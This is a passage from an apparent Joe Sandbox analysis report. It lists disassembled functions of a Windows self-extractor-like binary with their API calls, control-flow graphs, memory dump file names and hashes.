                                                                              • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00D28243,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D2AC59
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: File$CreateErrorLast$Time
                                                                              • String ID:
                                                                              • API String ID: 1999340476-0
                                                                              • Opcode ID: ff7c2185bb815a532fb1d2285211fcdc62a10c3741f403114cdcf59951a30b67
                                                                              • Instruction ID: e6a61668b6fab24c8cb962a4c33c7ad5fc6435e4419c3ec897ec16d61442dfee
                                                                              • Opcode Fuzzy Hash: ff7c2185bb815a532fb1d2285211fcdc62a10c3741f403114cdcf59951a30b67
                                                                              • Instruction Fuzzy Hash: B0316A345447956FE3309F28EC45BDABBD4FB11328F240B19F9A0962D1C3B0A884DBB2
                                                                              Function 00D3C758 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 976 d3c758-d3c771 PeekMessageW 977 d3c773-d3c787 GetMessageW 976->977 978 d3c7ac-d3c7ae 976->978 979 d3c789-d3c796 IsDialogMessageW 977->979 980 d3c798-d3c7a6 TranslateMessage DispatchMessageW 977->980 979->978 979->980 980->978
                                                                              APIs
                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D3C769
                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D3C77A
                                                                              • IsDialogMessageW.USER32(000204C8,?), ref: 00D3C78E
                                                                              • TranslateMessage.USER32(?), ref: 00D3C79C
                                                                              • DispatchMessageW.USER32(?), ref: 00D3C7A6
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: Message$DialogDispatchPeekTranslate
                                                                              • String ID:
                                                                              • API String ID: 1266772231-0
                                                                              • Opcode ID: 69303e731164a73dc91610efbedf9290e9e4438a2fefbf3a5257ffe53a4e88e2
                                                                              • Instruction ID: 31502375fba8f0c1dff3c06faa487dd4e0998a79a764f3437cc73e71a3264b94
                                                                              • Opcode Fuzzy Hash: 69303e731164a73dc91610efbedf9290e9e4438a2fefbf3a5257ffe53a4e88e2
                                                                              • Instruction Fuzzy Hash: 46F0D0B5911619ABCB209BA5EC4CDDB7FACEE05391B404415B906E2254E764D505CBF0
                                                                              Function 00D3BBC0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 981 d3bbc0-d3bbdf GetClassNameW 982 d3bbe1-d3bbf6 call d33316 981->982 983 d3bc07-d3bc09 981->983 988 d3bc06 982->988 989 d3bbf8-d3bc04 FindWindowExW 982->989 984 d3bc14-d3bc16 983->984 985 d3bc0b-d3bc0e SHAutoComplete 983->985 985->984 988->983 989->988
                                                                              APIs
                                                                              • GetClassNameW.USER32(?,?,00000050), ref: 00D3BBD7
                                                                              • SHAutoComplete.SHLWAPI(?,00000010), ref: 00D3BC0E
                                                                                • Part of subcall function 00D33316: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00013316,00D2D523,00000000,.exe,?,?,00000800,?,?,?,00D39E5C), ref: 00D3332C
                                                                              • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00D3BBFE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                              • String ID: EDIT
                                                                              • API String ID: 4243998846-3080729518
                                                                              • Opcode ID: bb6b716dec9b8a291121a81a0f2cec6d0621805a39a9f3504c40540dc8c06b0c
                                                                              • Instruction ID: c90bd2b60f7a43fdf8773cae879909d4dd1db46ba6928324c5997f4952e5cb78
                                                                              • Opcode Fuzzy Hash: bb6b716dec9b8a291121a81a0f2cec6d0621805a39a9f3504c40540dc8c06b0c
                                                                              • Instruction Fuzzy Hash: A2F08232A007287BDB305765AC09F9F7A6CAB46B50F480022BE40F2284DB60E901C6F6
                                                                              Function 00D3ED2E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 990 d3ed2e-d3ed59 call d3ffd0 SetEnvironmentVariableW call d3169e 994 d3ed5e-d3ed62 990->994 995 d3ed86-d3ed88 994->995 996 d3ed64-d3ed68 994->996 997 d3ed71-d3ed78 call d317ba 996->997 1000 d3ed6a-d3ed70 997->1000 1001 d3ed7a-d3ed80 SetEnvironmentVariableW 997->1001 1000->997 1001->995
                                                                              APIs
                                                                              • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00D3ED44
                                                                              • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00D3ED80
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: EnvironmentVariable
                                                                              • String ID: sfxcmd$sfxpar
                                                                              • API String ID: 1431749950-3493335439
                                                                              • Opcode ID: a07ab37832fcd412dd9088a78c80bfb08d12008a464441dfa401c7a93b5736b5
                                                                              • Instruction ID: 74198f68ac8202e684c7fd4b7156d6948812dd9747a1548bb29554524c2bc722
                                                                              • Opcode Fuzzy Hash: a07ab37832fcd412dd9088a78c80bfb08d12008a464441dfa401c7a93b5736b5
                                                                              • Instruction Fuzzy Hash: 26F0E5B2901735ABDB202B909C06EBA7B68EF15B52F040111BC85961C6E660C884C6B1
                                                                              Function 00D44DA2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1002 d44da2-d44db7 LoadLibraryExW 1003 d44db9-d44dc2 GetLastError 1002->1003 1004 d44deb-d44dec 1002->1004 1005 d44dc4-d44dd8 call d47468 1003->1005 1006 d44de9 1003->1006 1005->1006 1009 d44dda-d44de8 LoadLibraryExW 1005->1009 1006->1004
                                                                              APIs
                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00D44D53,00000000,?,00D840C4,?,?,?,00D44EF6,00000004,InitializeCriticalSectionEx,00D57424,InitializeCriticalSectionEx), ref: 00D44DAF
                                                                              • GetLastError.KERNEL32(?,00D44D53,00000000,?,00D840C4,?,?,?,00D44EF6,00000004,InitializeCriticalSectionEx,00D57424,InitializeCriticalSectionEx,00000000,?,00D44CAD), ref: 00D44DB9
                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00D44DE1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad$ErrorLast
                                                                              • String ID: api-ms-
                                                                              • API String ID: 3177248105-2084034818
                                                                              • Opcode ID: d40f846c6967ff85824536d82475de68e368ec3c03a809cf2f30241e6075bae8
                                                                              • Instruction ID: 2f2bcda9e67d1f57108d7eeb82011d60ccc0e715041cdd9e93f1e8f898ae50a1
                                                                              • Opcode Fuzzy Hash: d40f846c6967ff85824536d82475de68e368ec3c03a809cf2f30241e6075bae8
                                                                              • Instruction Fuzzy Hash: B4E04F38684304BBEF101B61EC06B6A3F58AF00B57F280020FE0CE85E0E765A9D095B5
                                                                              Function 00D2A9E5 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1010 d2a9e5-d2a9f1 1011 d2a9f3-d2a9fb GetStdHandle 1010->1011 1012 d2a9fe-d2aa15 ReadFile 1010->1012 1011->1012 1013 d2aa71 1012->1013 1014 d2aa17-d2aa20 call d2ab1c 1012->1014 1015 d2aa74-d2aa77 1013->1015 1018 d2aa22-d2aa2a 1014->1018 1019 d2aa39-d2aa3d 1014->1019 1018->1019 1022 d2aa2c 1018->1022 1020 d2aa4e-d2aa52 1019->1020 1021 d2aa3f-d2aa48 GetLastError 1019->1021 1024 d2aa54-d2aa5c 1020->1024 1025 d2aa6c-d2aa6f 1020->1025 1021->1020 1023 d2aa4a-d2aa4c 1021->1023 1026 d2aa2d-d2aa37 call d2a9e5 1022->1026 1023->1015 1024->1025 1027 d2aa5e-d2aa67 GetLastError 1024->1027 1025->1015 1026->1015 1027->1025 1029 d2aa69-d2aa6a 1027->1029 1029->1026
                                                                              APIs
                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00D2A9F5
                                                                              • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00D2AA0D
                                                                              • GetLastError.KERNEL32 ref: 00D2AA3F
                                                                              • GetLastError.KERNEL32 ref: 00D2AA5E
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$FileHandleRead
                                                                              • String ID:
                                                                              • API String ID: 2244327787-0
                                                                              • Opcode ID: 555b31b5a87870a0d021feedcaa000afdbdb5f175bfeb7480e49788bd84a7a8c
                                                                              • Instruction ID: 47277b8b9b2ded7e425d833739deed7c52e30af820bfbbd642af155cd6003234
                                                                              • Opcode Fuzzy Hash: 555b31b5a87870a0d021feedcaa000afdbdb5f175bfeb7480e49788bd84a7a8c
                                                                              • Instruction Fuzzy Hash: B7114C31900224ABCF209F68EE0466A37A9FF2136DF244626E95685290D774CE84DB73
                                                                              Function 00D4BEF4 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1031 d4bef4-d4bf08 1032 d4bf15-d4bf30 LoadLibraryExW 1031->1032 1033 d4bf0a-d4bf13 1031->1033 1035 d4bf32-d4bf3b GetLastError 1032->1035 1036 d4bf59-d4bf5f 1032->1036 1034 d4bf6c-d4bf6e 1033->1034 1037 d4bf3d-d4bf48 LoadLibraryExW 1035->1037 1038 d4bf4a 1035->1038 1039 d4bf61-d4bf62 FreeLibrary 1036->1039 1040 d4bf68 1036->1040 1041 d4bf4c-d4bf4e 1037->1041 1038->1041 1039->1040 1042 d4bf6a-d4bf6b 1040->1042 1041->1036 1043 d4bf50-d4bf57 1041->1043 1042->1034 1043->1042
                                                                              APIs
                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00D45281,00000000,00000000,?,00D4BE9B,00D45281,00000000,00000000,00000000,?,00D4C098,00000006,FlsSetValue), ref: 00D4BF26
                                                                              • GetLastError.KERNEL32(?,00D4BE9B,00D45281,00000000,00000000,00000000,?,00D4C098,00000006,FlsSetValue,00D58A00,FlsSetValue,00000000,00000364,?,00D4A5E7), ref: 00D4BF32
                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00D4BE9B,00D45281,00000000,00000000,00000000,?,00D4C098,00000006,FlsSetValue,00D58A00,FlsSetValue,00000000), ref: 00D4BF40
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad$ErrorLast
                                                                              • String ID:
                                                                              • API String ID: 3177248105-0
                                                                              • Opcode ID: 50a4f4f16a356e0dad60db52155cafd1f0ba4491ebe6b8c3fa283caa97edc491
                                                                              • Instruction ID: 18744dbd152abfdea1977169bdd719cab5cfb1c7b6ae744e48f7f6c4a8daf97e
                                                                              • Opcode Fuzzy Hash: 50a4f4f16a356e0dad60db52155cafd1f0ba4491ebe6b8c3fa283caa97edc491
                                                                              • Instruction Fuzzy Hash: F801F7322153239BCB214A68AC44A577798AF25BB6B290621FD4EE3290D721D805CEF0
                                                                              Function 00D2B20A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00D2E79B,00000001,?,?,?,00000000,00D366C2,?,?,?), ref: 00D2B22E
                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00D366C2,?,?,?,?,?,00D36184,?), ref: 00D2B275
                                                                              • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00D2E79B,00000001,?,?), ref: 00D2B2A1
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: FileWrite$Handle
                                                                              • String ID:
                                                                              • API String ID: 4209713984-0
                                                                              • Opcode ID: 7dc383671772dc8b2a2d0a6f68f27870f7e6ac075c93eec7b5296b2d96f3bb22
                                                                              • Instruction ID: 16794ad019da89fb7dd7dac555749d16a191f77dda0cc1e4f57f3cad4f45435a
                                                                              • Opcode Fuzzy Hash: 7dc383671772dc8b2a2d0a6f68f27870f7e6ac075c93eec7b5296b2d96f3bb22
                                                                              • Instruction Fuzzy Hash: 3C31B531148325EFDB14CF14E818B6E77A5FFA1729F04451EF981A7290CBB49988CBB6
                                                                              Function 00D2B542 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00D2D68B: _wcslen.LIBCMT ref: 00D2D691
                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00D2B405,?,00000001,00000000,?,?), ref: 00D2B569
                                                                              • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00D2B405,?,00000001,00000000,?,?), ref: 00D2B59C
                                                                              • GetLastError.KERNEL32(?,?,?,?,00D2B405,?,00000001,00000000,?,?), ref: 00D2B5B9
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: CreateDirectory$ErrorLast_wcslen
                                                                              • String ID:
                                                                              • API String ID: 2260680371-0
                                                                              • Opcode ID: 1fec844170739e9eb83649e95954326af279c78d92fcd76f635f8212d55e3c16
                                                                              • Instruction ID: 3a9b67f63367f7c04be8eea19a4778d555653a44d9d6ef8b5801f4a0d49276bd
                                                                              • Opcode Fuzzy Hash: 1fec844170739e9eb83649e95954326af279c78d92fcd76f635f8212d55e3c16
                                                                              • Instruction Fuzzy Hash: B201F5312043746AEF216B747C45BEE3358DF297ADF180016FA01DA1C5DB94CA8186B1
                                                                              Function 00D4CA53 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00D4CA78
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: Info
                                                                              • String ID:
                                                                              • API String ID: 1807457897-3916222277
                                                                              • Opcode ID: 9cb5a8c2f1d7f2915dae78caac0d834bcebfda3e4a8f8d8ad82b21b32402e2c2
                                                                              • Instruction ID: 91a0793186269c35e8812ada86a357d6805220b5e946c036d55cb3d2e7a1f569
                                                                              • Opcode Fuzzy Hash: 9cb5a8c2f1d7f2915dae78caac0d834bcebfda3e4a8f8d8ad82b21b32402e2c2
                                                                              • Instruction Fuzzy Hash: E841F57150528C9BDF228E68CC85AF6BBE9EB55304F1818EDE5CA87142D235AA458F30
                                                                              Function 00D4C12C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,62E85006,00000001,?,?), ref: 00D4C19D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: String
                                                                              • String ID: LCMapStringEx
                                                                              • API String ID: 2568140703-3893581201
                                                                              • Opcode ID: a90e16de5e93287ae1722906b852f8a68acf64165a0ec3bb5b982ac2e4088646
                                                                              • Instruction ID: 5de77b5c863134e410ad2cc14eb54a8e02f1f9bd2fa46121981993938033360c
                                                                              • Opcode Fuzzy Hash: a90e16de5e93287ae1722906b852f8a68acf64165a0ec3bb5b982ac2e4088646
                                                                              • Instruction Fuzzy Hash: 56012532501208BFCF029FA0DC01DEE3FA2EF08761F045115FE0866161CB729975ABA0
                                                                              Function 00D4C0CA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00D4B72F), ref: 00D4C115
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: CountCriticalInitializeSectionSpin
                                                                              • String ID: InitializeCriticalSectionEx
                                                                              • API String ID: 2593887523-3084827643
                                                                              • Opcode ID: cb47a8a7ccd65f6389a909c87ebb16e4d422deb1a013c4dcb24c66628d3c3cd4
                                                                              • Instruction ID: 9941aff2121fc2bff91e5f99fa7f9f4f5ba9bd553d59076d0c4e469fe43ea2d0
                                                                              • Opcode Fuzzy Hash: cb47a8a7ccd65f6389a909c87ebb16e4d422deb1a013c4dcb24c66628d3c3cd4
                                                                              • Instruction Fuzzy Hash: 55F0BE31A41318BFCF019F90CC02CAE7FA1EF287A2B004026FD096A260CF719955ABB0
                                                                              Function 00D4BF6F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
